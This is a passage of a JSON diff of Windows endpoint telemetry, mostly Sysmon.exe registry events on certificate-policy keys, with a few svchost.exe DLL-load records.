"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904340000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904490000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ncryptsslp.dll", - "image_path": "C:\\Windows\\System32\\ncryptsslp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": 
"mpr.dll", - "image_path": "C:\\Windows\\System32\\mpr.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570905119984, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { 
- "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 